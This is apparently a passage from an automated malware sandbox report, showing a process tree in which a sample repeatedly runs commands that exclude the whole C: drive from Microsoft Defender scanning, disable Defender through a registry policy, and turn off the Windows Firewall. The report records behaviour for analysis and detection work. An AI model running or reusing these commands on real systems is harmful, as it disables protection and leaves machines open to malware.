      PID:3908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5716
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1632
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3852
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5532
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1376
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3272
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4180
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5676
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5876
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1664
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:6140
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5996
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5240
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5264
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5708
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5456
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5224
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2432
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3008
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5264
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5104
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5156
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5916
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:640
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1064
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5800
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5616
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2404
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3888
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5384
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5748
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5156
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5512
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5844
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1372
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6096
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2380
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3924
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5372
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5708
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3252
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6040
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2884
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4732
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5892
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5948
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6100
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3692
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5568
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:996
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5552
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5212
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3296
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5292
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4840
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5144
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4880
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6136
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4620
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5292
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5584
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4324
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2780
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5856
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4344
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4324
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4932
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7116
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7128
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6996
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7004
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6400
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6516
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6548
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6228
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7012
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6092
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1552
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4592
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4832
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5708
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6652
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6720
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1960
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3936
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3452
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5204
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7056
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6296
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:864
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6028
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6768
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3988
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7088
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5732
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5512
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2672
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3516
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6264
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7824
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5280
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5360
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7576
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7156
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4936
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6356
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7352
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7556
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4796
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7748
